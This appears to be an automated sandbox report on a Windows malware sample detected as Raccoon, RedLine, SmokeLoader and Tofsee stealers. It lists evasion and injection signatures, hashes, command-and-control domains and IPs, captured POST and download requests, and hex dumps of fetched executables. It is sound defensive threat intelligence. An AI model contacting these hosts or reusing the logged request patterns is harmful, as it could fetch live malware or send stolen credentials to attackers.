Windows Analysis Report pAWNholT8X.exe

Overview

General Information

Sample Name: pAWNholT8X.exe
Analysis ID: 491658
MD5: fb45ecbfb0e13b103b6b1c583479a21d
SHA1: 9cb9eead55f3b3f4847fd8f1bdd8d20ca46d9dc2
SHA256: d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6
Tags: CoinMinerexe
Infos:

Most interesting Screenshot:

Detection

Raccoon RedLine SmokeLoader Tofsee
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (window names)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
PE file contains section with special chars
Hides threads from debuggers
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Machine Learning detection for dropped file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Yara detected Credential Stealer
Contains functionality to call native functions
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Social media urls found in memory data
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 0000001E.00000002.653738313.000000000114D000.00000002.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://geenaldencia9.top/ Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\757C.exe Avira: detection malicious, Label: HEUR/AGEN.1106254
Multi AV Scanner detection for submitted file
Source: pAWNholT8X.exe Virustotal: Detection: 36% Perma Link
Source: pAWNholT8X.exe ReversingLabs: Detection: 40%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\CEB6.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\757C.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FE25.exe Joe Sandbox ML: detected

Compliance:

barindex
Uses 32bit PE files
Source: pAWNholT8X.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49837 version: TLS 1.2
Source: Binary string: Z:\Development\Secureuser\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 8433.exe
Source: Binary string: #fNC:\neziyotugi voyosededidi.pdb source: 6CB1.exe, 00000010.00000000.473271527.0000000000412000.00000002.00020000.sdmp
Source: Binary string: C:\neziyotugi voyosededidi.pdb source: 6CB1.exe, 00000010.00000000.473271527.0000000000412000.00000002.00020000.sdmp
Source: Binary string: C:\hebesolazo\fanelugiken.pdb source: pAWNholT8X.exe, 00000000.00000002.364281095.0000000000412000.00000002.00020000.sdmp, ecrjwib, 0000000F.00000000.461024163.0000000000412000.00000002.00020000.sdmp
Source: Binary string: )/C:\hebesolazo\fanelugiken.pdb source: pAWNholT8X.exe, 00000000.00000002.364281095.0000000000412000.00000002.00020000.sdmp, ecrjwib, 0000000F.00000000.461024163.0000000000412000.00000002.00020000.sdmp

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.6:49843 -> 194.180.174.100:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: nityanneron5.top
Source: C:\Windows\explorer.exe Domain query: lynettaram7.top
Source: C:\Windows\explorer.exe Domain query: umayaniela6.top
Source: C:\Windows\explorer.exe Domain query: jebeccallis4.top
Source: C:\Windows\explorer.exe Domain query: privacy-toolz-for-you-403.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: sadineyalas8.top
Source: C:\Windows\explorer.exe Domain query: naghenrietti1.top
Source: C:\Windows\explorer.exe Domain query: geenaldencia9.top
Source: C:\Windows\explorer.exe Domain query: kimballiett2.top
Source: C:\Windows\explorer.exe Domain query: xadriettany3.top
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 9080
Source: unknown Network traffic detected: HTTP traffic on port 9080 -> 49841
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /hcdrom1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 132Host: 194.180.174.100
Source: global traffic HTTP traffic detected: GET //l/f/1pHWJnwB3dP17SpzF3sp/6cbf9ba43fa4774c97b7a910fd83e29808663306 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.100
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 Sep 2021 17:34:20 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Mon, 27 Sep 2021 17:34:02 GMTETag: "20000-5ccfd80bdc4c3"Accept-Ranges: bytesContent-Length: 131072Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 04 b3 00 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 02 01 00 00 48 09 00 00 00 00 00 2c 1b 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 0a 00 00 04 00 00 f1 c4 02 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 51 01 00 4f 00 00 00 2c 49 01 00 3c 00 00 00 00 c0 09 00 f0 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 21 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 34 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 01 01 00 00 10 00 00 00 02 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ef 31 00 00 00 20 01 00 00 32 00 00 00 06 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 55 08 00 00 60 01 00 00 1e 00 00 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 a8 00 00 00 c0 09 00 00 aa 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 17:35:21 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-toolz-for-you-403.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: geenaldencia9.top
Source: global traffic HTTP traffic detected: GET /a.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.56.146.41:9080
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: geenaldencia9.top
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49841 -> 193.56.146.41:9080
Social media urls found in memory data
Source: 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Sep 2021 17:34:18 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38X-Powered-By: PHP/5.5.38Content-Length: 25Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 14 00 00 00 7b fa f1 1f b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 Data Ascii: {i+,GO
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: svchost.exe, 0000000D.00000002.505111408.000001D408B00000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000000D.00000002.503887822.000001D4082EB000.00000004.00000001.sdmp String found in binary or memory: http://crl.ver)
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/AckRequested
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CloseSequence
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CloseSequenceResponse
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CreateSequence
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CreateSequenceResponse
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/SequenceAcknowledgement
